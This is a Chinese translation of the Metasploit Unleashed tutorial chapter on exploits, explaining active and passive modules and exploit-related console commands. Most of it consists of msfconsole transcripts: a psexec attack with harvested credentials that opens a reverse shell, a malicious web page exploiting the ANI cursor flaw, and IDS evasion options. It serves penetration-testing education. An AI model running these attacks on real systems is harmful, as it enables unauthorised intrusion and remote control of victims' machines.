翻译者说明1：本文为Metasploit Unleashed中文版翻译。原文链接：https://www.offensive-security.com/metasploit-unleashed/

翻译者说明2：为减轻翻译负担采用了机器翻译，翻译者从中人工剔除了机翻错误或歧义的问题，但难免会存在小问题，请读者见谅。如发现文章翻译存在问题，可在文章下方评论留言。

翻译者说明3：如果你喜欢这篇翻译，请给关注一下我并给文章点个赞，你的支持是给我工作的最大鼓励。

翻译者说明4：其他章节一并整合在专栏中，如有兴趣可关注专栏了解更多内容。

四、METASPLOIT 基础

3. Exploits 漏洞利用

Metasploit框架中的所有漏洞利用将分为两类：主动和被动。

a）主动 exploit

主动exploits将利用特定主机，运行直至完成，然后退出。

当外壳程序从受害者那里打开时，暴力破解模块将退出。
如果遇到错误，模块执行将停止。
您可以通过将-j传递给 exploit 命令来强制将激活的模块置于后台：

msf exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.
msf exploit(ms08_067_netapi) >

实例

以下示例利用以前获取的一组凭据来利用和获取目标系统上的反向 shell。

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.1.100
RHOST => 192.168.1.100
msf exploit(psexec) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf exploit(psexec) > set LPORT 4444
LPORT => 4444
msf exploit(psexec) > set SMBUSER victim
SMBUSER => victim
msf exploit(psexec) > set SMBPASS s3cr3t
SMBPASS => s3cr3t
msf exploit(psexec) > exploit[*] Connecting to the server...
[*] Started reverse handler
[*] Authenticating as user 'victim'...
[*] Uploading payload...
[*] Created \hikmEeEM.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (ciWyCVEp - "MXAVZsCqfRtZwScLdexnD")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \hikmEeEM.exe...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.100:1073)Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.C:\WINDOWS\system32>

b）被动 exploit

被动exploit会等待传入的主机，并在它们连接时利用它们。

被动exploit几乎总是集中在客户端，如Web浏览器，FTP客户端等。
它们还可以与电子邮件攻击结合使用，等待连接。
被动exploit会在 shell 发生时报告 shell，可以通过将 -l 传递给 sessions 命令来枚举。传递-i将与 shell 交互。

msf exploit(ani_loadimage_chunksize) > sessions -lActive sessions
===============Id  Description  Tunnel--  -----------  ------1   Meterpreter  192.168.1.5:52647 -> 192.168.1.100:4444msf exploit(ani_loadimage_chunksize) > sessions -i 1
[*] Starting interaction with 1...meterpreter >

实例

以下输出显示了利用动画光标漏洞的设置。在受害者浏览到我们的恶意网站之前，该漏洞不会触发。

msf > use exploit/windows/browser/ani_loadimage_chunksize
msf exploit(ani_loadimage_chunksize) > set URIPATH /
URIPATH => /
msf exploit(ani_loadimage_chunksize) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(ani_loadimage_chunksize) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf exploit(ani_loadimage_chunksize) > set LPORT 4444
LPORT => 4444
msf exploit(ani_loadimage_chunksize) > exploit
[*] Exploit running as background job.[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/
[*]  Local IP: http://192.168.1.5:8080/
[*] Server started.
msf exploit(ani_loadimage_chunksize) >
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending HTML page to 192.168.1.100:1077...
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP) to 192.168.1.100:1077...
[*] Sending stage (240 bytes)
[*] Command shell session 2 opened (192.168.1.5:4444 -> 192.168.1.100:1078)msf exploit(ani_loadimage_chunksize) > sessions -i 2
[*] Starting interaction with 2...Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.C:\Documents and Settings\victim\Desktop>

接下来，我们将看看如何实际在Metasploit中使用漏洞。

c）使用漏洞

在 Metasploit 中选择exploits会将该exploits和check命令添加到 msfconsole。

msf > use  exploit/windows/smb/ms09_050_smb2_negotiate_func_index
msf exploit(ms09_050_smb2_negotiate_func_index) > help
...snip...
Exploit Commands
================Command       Description-------       -----------check         Check to see if a target is vulnerableexploit       Launch an exploit attemptpry           Open a Pry session on the current modulercheck        Reloads the module and checks if the target is vulnerablereload        Just reloads the modulererun         Alias for rexploitrexploit      Reloads the module and launches an exploit attemptrun           Alias for exploitmsf exploit(ms09_050_smb2_negotiate_func_index) >

show

使用exploits还会向 show 命令添加更多选项。

MSF Exploit Targets（漏洞利用的目标）

msf exploit(ms09_050_smb2_negotiate_func_index) > show targetsExploit targets:Id  Name--  ----0   Windows Vista SP1/SP2 and Server 2008 (x86)

MSF Exploit Payloads（漏洞利用的负载）

msf exploit(ms09_050_smb2_negotiate_func_index) > show payloadsCompatible Payloads
===================Name                              Disclosure Date  Rank    Description----                              ---------------  ----    -----------generic/custom                                     normal  Custom Payloadgeneric/debug_trap                                 normal  Generic x86 Debug Trapgeneric/shell_bind_tcp                             normal  Generic Command Shell, Bind TCP Inlinegeneric/shell_reverse_tcp                          normal  Generic Command Shell, Reverse TCP Inlinegeneric/tight_loop                                 normal  Generic x86 Tight Loopwindows/adduser                                    normal  Windows Execute net user /ADD
...snip...

MSF Exploit Options（漏洞利用的选项）

msf exploit(ms09_050_smb2_negotiate_func_index) > show optionsModule options (exploit/windows/smb/ms09_050_smb2_negotiate_func_index):Name   Current Setting  Required  Description----   ---------------  --------  -----------RHOST                   yes       The target addressRPORT  445              yes       The target port (TCP)WAIT   180              yes       The number of seconds to wait for the attack to complete.Exploit target:Id  Name--  ----0   Windows Vista SP1/SP2 and Server 2008 (x86)

ADVANCED（漏洞利用的更高级选项）

msf exploit(ms09_050_smb2_negotiate_func_index) > show advancedModule advanced options (exploit/windows/smb/ms09_050_smb2_negotiate_func_index):Name                    Current Setting    Required  Description----                    ---------------    --------  -----------CHOST                                      no        The local client addressCPORT                                      no        The local client portConnectTimeout          10                 yes       Maximum number of seconds to establish a TCP connectionContextInformationFile                     no        The information file that contains context informationDisablePayloadHandler   false              no        Disable the handler code for the selected payloadEnableContextEncoding   false              no        Use transient context when encoding payloads
...snip...

EVASION

msf exploit(ms09_050_smb2_negotiate_func_index) > show evasion
Module evasion options:Name                           Current Setting  Required  Description----                           ---------------  --------  -----------SMB::obscure_trans_pipe_level  0                yes       Obscure PIPE string in TransNamedPipe (level 0-3)SMB::pad_data_level            0                yes       Place extra padding between headers and data (level 0-3)SMB::pad_file_level            0                yes       Obscure path names used in open/create (level 0-3)SMB::pipe_evasion              false            yes       Enable segmented read/writes for SMB PipesSMB::pipe_read_max_size        1024             yes       Maximum buffer size for pipe readsSMB::pipe_read_min_size        1                yes       Minimum buffer size for pipe readsSMB::pipe_write_max_size       1024             yes       Maximum buffer size for pipe writesSMB::pipe_write_min_size       1                yes       Minimum buffer size for pipe writesTCP::max_send_size             0                no        Maxiumum tcp segment size.  (0 = disable)TCP::send_delay                0                no        Delays inserted before every send.  (0 = disable)

第四期_Metasploit 基础(三)Exploits《Metasploit Unleashed Simplified Chinese version（Metasploit官方文档教程中文版）》相关推荐

第四期_Metasploit 基础(六)Meterprete《Metasploit Unleashed Simplified Chinese version（Metasploit官方文档教程中文版）》
翻译者说明1:本文为Metasploit Unleashed中文版翻译.原文链接:https://www.offensive-security.com/metasploit-unleashed/ 翻译 ...
第五期_信息收集《Metasploit Unleashed Simplified Chinese version（Metasploit官方文档教程中文版）》
翻译者说明1:本文为Metasploit Unleashed中文版翻译.原文链接:https://www.offensive-security.com/metasploit-unleashed/ 翻译 ...
第三期_Metasploit 介绍《Metasploit Unleashed Simplified Chinese version（Metasploit官方文档教程中文版）》
翻译者说明1:本文为Metasploit Unleashed中文版翻译.原文链接:https://www.offensive-security.com/metasploit-unleashed/ 翻译 ...
第十三期_维护访问权限《Metasploit Unleashed Simplified Chinese version（Metasploit官方文档教程中文版）》
翻译者说明1:本文为Metasploit Unleashed中文版翻译.原文链接:https://www.offensive-security.com/metasploit-unleashed/ 翻译 ...
spark之4：基础指南（源自官方文档）
spark之4:基础指南(源自官方文档) @(SPARK)[spark, 大数据] spark之4基础指南源自官方文档一简介二接入Spark 三初始化Spark 一使用Shell 四弹性分布式数据 ...
OpenGL ES着色器语言之变量和数据类型（二）（官方文档第四章）
OpenGL ES着色器语言之变量和数据类型(二)(官方文档第四章) 4.5精度和精度修饰符 4.5.1范围和精度用于存储和展示浮点数.整数变量的范围和精度依赖于数值的源(varying,unifo ...
Spring Framework 官方文档学习（四）之Validation、Data Binding、Type Conversion（二）
接前一篇 Spring Framework 官方文档学习(四)之Validation.Data Binding.Type Conversion(一) 本篇主要内容:Spring Type Conver ...
【Java基础】2020如何查看Java官方文档
一.首先百度搜索oracle进入oracle公司官网(注意是官网). 二.点击首页最下角的developers(开发者). 三.点击开发者页面中间部分的technologies(技术),点击java. ...
Spring Framework 官方文档学习（四）之Validation、Data Binding、Type Conversion
本篇太乱,请移步: Spring Framework 官方文档学习(四)之Validation.Data Binding.Type Conversion(一) 写了删删了写,反复几次,对自己的描述很不 ...

第四期_Metasploit 基础(三)Exploits《Metasploit Unleashed Simplified Chinese version（Metasploit官方文档教程中文版）》